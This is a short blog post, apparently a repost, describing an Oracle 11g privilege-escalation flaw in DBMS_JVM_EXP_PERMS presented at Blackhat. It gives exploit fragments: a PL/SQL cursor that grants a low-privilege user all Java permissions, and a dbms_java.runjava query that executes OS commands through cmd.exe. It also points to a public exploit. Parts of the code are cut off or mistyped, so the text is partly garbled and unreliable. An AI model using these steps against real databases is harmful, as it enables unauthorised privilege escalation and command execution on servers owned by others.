Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<
FETCH C1 BULK COLLECT INTO POL;
Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).
However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\syste\\cmd.exe
/c dir>c:\\out.lst’)from dual;
To download video about this presentattion, here.
Some of them said Blackhat has removed this video, but i can download it last week.
Article from :http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/
Here are links that related to Hacking Oracle 11g: